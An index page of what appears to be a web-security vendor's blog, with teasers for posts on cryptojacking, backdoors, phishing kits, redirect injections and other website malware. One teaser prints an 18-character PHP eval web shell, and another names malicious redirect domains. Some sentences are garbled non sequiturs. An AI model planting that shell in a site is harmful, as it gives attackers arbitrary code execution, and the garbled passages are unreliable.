Quttera | BLOG

A blog about real-life cybersecurity attacks, web malware and how to protect your website and online business from cybercriminals.

Cryptocurrency mining malware is gaining popularity among hackers. Attackers are now using GitHub and other well-known repositories to store and serve their malicious code. On GitHub, free accounts are created to commit the obfuscated code so that it can be used in injections later. The encrypted payload usually disguises itself as a legitimate jQuery file or another familiar library file. It looks like this new security threat, cryptojacking, is here to stay in 2018.

Read more →

Brute-force attacks make up a significant portion of the modern web server attack landscape; their goal is to gain access to content management system (CMS) dashboards by guessing admin usernames and passwords. Once access has been achieved, hackers gain full control of the compromised website and can use it to send spam, inject malicious JavaScript code into the database, or simply redirect all visitors to a third-party resource to generate traffic (also known as traffic hijacking).

Read more →

Background

Only a few days ago, we released a write-up about hackers using compromised websites for bitcoin mining. Just recently we responded to another hacking incident that uses the website visitor's computer for bitcoin mining. Bitcoin mining is primarily a means of earning commission on bitcoin transactions. Here is a simplistic explanation of what bitcoin mining is and why hackers want to use your site's visitors' computers. Each time a bitcoin is bought, traded or sold, a record of the transaction must be created.

Read more →

In our recent post about anti-malware myths, we spoke of visitor-dependent malware. Three of the methods used to decide which visitors to attack and which to hide from are geolocation awareness, IP address awareness, and language awareness. Malware and phishing content hidden on a business's website may infect visitors from some locations while ignoring visitors from others. This behavior can help malware hide on a compromised website for weeks, months, or even years.

Read more →

Protecting Your Online Success with Anti-Malware for Websites

ThreatSign users represent almost every industry out there. Each one is doing a great job in their own domain of expertise, creating products and services that change their clients' lives for the better: assistive software solutions that help people with dyslexia and dysgraphia in their struggle to read and write, a biotech company researching new medicines, resort boutiques, healthcare services, and the list goes on.

Read more →

Public Computers, Malware, and I Never Thought I Would Find Malware There!

Name seven places where you might find public computers. Let me see if I can guess what you came up with: hotels, libraries, airports, coffee shops, job search assistance locations, schools, and conference facilities. Let me add one more: the microphone. Let's begin with the realization that some public computers are open to all or most of the public, but even those that restrict who can use them are still public computers.

Read more →

Introduction

Bitcoin is a digital currency that has been around since 2008 but was released in 2009. Recently, it has been gaining popularity because of the increasing number of merchants that accept bitcoins as a form of payment. The current Bitcoin exchange rate to USD is off the charts and is still climbing higher.

How Hackers Use Your Website For BitCoin Mining?

One of the ThreatSign customers recently asked us to monitor their website as they were experiencing high CPU usage.

Read more →

This is not just another phishing attack blog. This is about your business's well-being should your website be compromised. This is about hosting providers who may inadvertently allow multiple clients' websites to be compromised simultaneously, thereby putting their own business at risk. This is about protecting reputations and maintaining accessibility to your website or to the websites that you host. Janet Evans is an American swimmer who won four Olympic gold medals and one silver medal.

Read more →

Ransomware Cyber-Attack Threat

Continually improving ransomware attacks are a challenge that IT companies, online businesses, health trusts and even governments are facing. In the short term, a ransomware infection blocks access to essential files on a computer or server for weeks or months. Such a cyber security incident is dangerous for daily business operations, knocking out successful businesses until recovery from the hack. In the long term, a ransomware infection has severe consequences, striking the business's reputation and leading to commercial and financial collapse.

Read more →

Introduction

During a recent phishing incident handled by the ThreatSign incident response team, a phishing link led to the discovery of a phishing kit. Prompt action allowed us to mitigate the threat and prevent its distribution in the wild. Let's skip the attack background and head straight to the phish kit details.

Office 365 PhishKit MD5: b46a0a1035e49e2e9e0218ebbd97fffe

The file is a zip archive that contains the whole directory of the phishing kit. Once the files are loaded on a web server, it shows a familiar Office 365 login page: Upon entering fictional credentials, the fake Office login page made the following requests:

Read more →

Introduction

Typically, backdoor malware is one of the initial stages of a cyber attack. Hackers find vulnerabilities on the site, upload arbitrary files (in this case a backdoor) to your site, and then access them via the browser. This is how a plain old backdoor looks: For more information about backdoors, see FilesMan Backdoor Malware On Your Computer.

Using Legitimate Code Wrappers To Avoid Detection By The Web Malware Scanners

The above-mentioned type of backdoor has identifiable signatures, which are distributed among security vendors and then used in traditional (signature-based) detection algorithms.

Read more →

Introduction

In the last few days we received lots of JavaScript infections related to page redirection. One of the most common techniques is an injected JavaScript that targets the WordPress CMS. The attacker inserts the link hxxs://traffictrade[.]life/scripts.js on each page. This link then redirects your site's visitors to https://redirect[.]trafficreceiver.club/landing/, where they see the malicious pop-ups. The interesting part is that there were no infected files on the customer's site. The only sign was the code injected into the 'wp_options' table inside the database.

Read more →

Introduction

The malicious payloads themselves are not always new, but the attack vectors are. Hackers are constantly evolving the way they attack. But once the infiltration succeeds, they fall back on good old techniques: they are already on your server and no further sophisticated obfuscation is required. We have uncovered new malware that uses websites to perform DDoS attacks. Malicious code was uploaded to the website and runs a bot that performs whatever the hacker wants it to do.

Read more →

Introduction

Site after site is being hacked every second we spend on the internet. Many of these are commercial sites that involve money or sensitive information crucial to the website owner. How are these sites being hacked anyway? The first and essential step in planning a cyber attack, which we already stressed in previous posts, is gathering security information on potential victim websites. Since the majority of commercial sites are built on a CMS (Content Management System), information on the underlying code is publicly available.

Read more →

PHP is a general server-side scripting language providing a very rich arsenal for web development. As part of it, PHP provides broad capabilities to develop generic shells that can run on almost every website. In a recent website malware cleanup we detected a generic shell that occupied only 18 characters. The following is the code of this shell, which is capable of executing any arbitrary malicious content submitted by attackers:

<?php @eval($_POST[yt]);

This shell has three major parts: @, the PHP error control operator, which makes the PHP interpreter ignore any error that occurs (http://php.

Read more →

Introduction

Each automated or manual cyber attack starts with gathering as much information about the targeted website or server as possible. Usually, the first step is “poc scanning”, which aims to locate and identify the execution environment setup. Website owners tend to neglect the protection of such information and are probably not aware of the accompanying risk. In this post, you will learn a simple technique you can use to improve your website's security.

Read more →

Introduction

Among Content Management Systems (CMS), WordPress is probably the most popular. Our statistics in the Annual Website Malware Report | 2016 show WordPress as the leading CMS in 2016. Due to its popularity, it is also prone to vulnerabilities. The same report shows that 76% of our infected customers were using WordPress.

What Are The Main Components Of The WordPress Installation?

Each WordPress website has three main parts:

Read more →

Introduction

We encountered 5-year-old malware while cleaning up one of our customers' websites. The malware used a drive-by download method to infect users.

What is Drive-by Download?

A drive-by download is an attack vector in which users download the payload without their knowledge or consent. It usually happens during a visit to an infected site, while reviewing an email, or by just clicking a popup advertisement.

What does the payload do?

Read more →

Introduction

This short post is about a recent attack that targets the Joomla! Content Management System and specifically its templates. We decided it is worth spreading the word about it after our malware experts resolved numerous similar incidents.

Attack On Joomla! Templates

The file index.php contains a malicious script that calls its main component like the snippet below: But if you view the site source via the web, the added script just before the head tag looks like this: Note: For stat88b.

Read more →

Introduction

As defined for a CMS (Content Management System), a plugin is a collection of code files that adds one or more features to your website. After you install the core code of your CMS, you can install your choice of plugins. Depending on the nature and design of your site, you can choose from thousands of plugins available on the internet. Our incident response team encountered one peculiar issue where a website got blacklisted for distributing adware to its visitors.

Read more →
